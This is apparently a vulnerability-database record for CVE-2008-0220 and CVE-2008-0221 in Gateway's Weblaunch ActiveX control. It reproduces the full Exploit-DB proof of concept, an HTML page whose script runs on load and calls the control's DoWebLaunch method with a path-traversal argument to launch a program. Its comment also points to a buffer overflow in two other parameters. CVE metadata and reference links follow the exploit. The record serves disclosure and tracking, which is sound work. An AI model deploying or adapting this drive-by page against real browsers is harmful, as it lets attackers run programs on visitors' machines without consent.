ID
VAR-E-200801-0050
CVE
| cve_id: | CVE-2008-0220 | Trust: 1.9 |
| cve_id: | CVE-2008-0221 | Trust: 1.0 |
EDB ID
4869
TITLE
Gateway Weblaunch - ActiveX Control Insecure Method - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Gateway Weblaunch - ActiveX Control Insecure Method. CVE-41653CVE-2008-0221CVE-41652CVE-2008-0220 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | gateway | model: | weblaunch | scope: | - | version: | - | Trust: 1.0 |
| vendor: | gateway | model: | weblaunch2.ocx cweblaunchctl activex control | scope: | eq | version: | 2.0 | Trust: 0.3 |
| vendor: | gateway | model: | weblaunch.ocx cweblaunchctl activex control | scope: | eq | version: | 1.0.0.1 | Trust: 0.3 |
EXPLOIT
<!--
Gateway Weblaunch ActiveX Control Insecure Method Exploit
Implemented Categories:
Category: Safe for Initialising
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
-->
<html>
<head>
<title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
<script language="JavaScript" defer>
function Check() {
//escape from systemdrive\documents and settings\username\local settings\temp
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
Unable to create object
</object>
</body>
</html>
# milw0rm.com [2008-01-08]
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
ActiveX Control Insecure Method
Trust: 1.0
CREDITS
Elazar
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2008-0220 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 4869 | Trust: 1.6 |
| db: | NVD | id: | CVE-2008-0221 | Trust: 1.0 |
| db: | EDBNET | id: | 29180 | Trust: 0.6 |
| db: | BID | id: | 27193 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2008-0220 | Trust: 1.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2008-0221 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/4869/ | Trust: 0.6 |
| url: | http://support.microsoft.com/kb/240797 | Trust: 0.3 |
| url: | http://www.gateway.com/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 27193 |
| db: | EXPLOIT-DB | id: | 4869 |
| db: | EDBNET | id: | 29180 |
LAST UPDATE DATE
2022-07-27T09:53:06.837000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 27193 | date: | 2015-05-07T17:33:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 27193 | date: | 2008-01-08T00:00:00 |
| db: | EXPLOIT-DB | id: | 4869 | date: | 2008-01-08T00:00:00 |
| db: | EDBNET | id: | 29180 | date: | 2008-01-08T00:00:00 |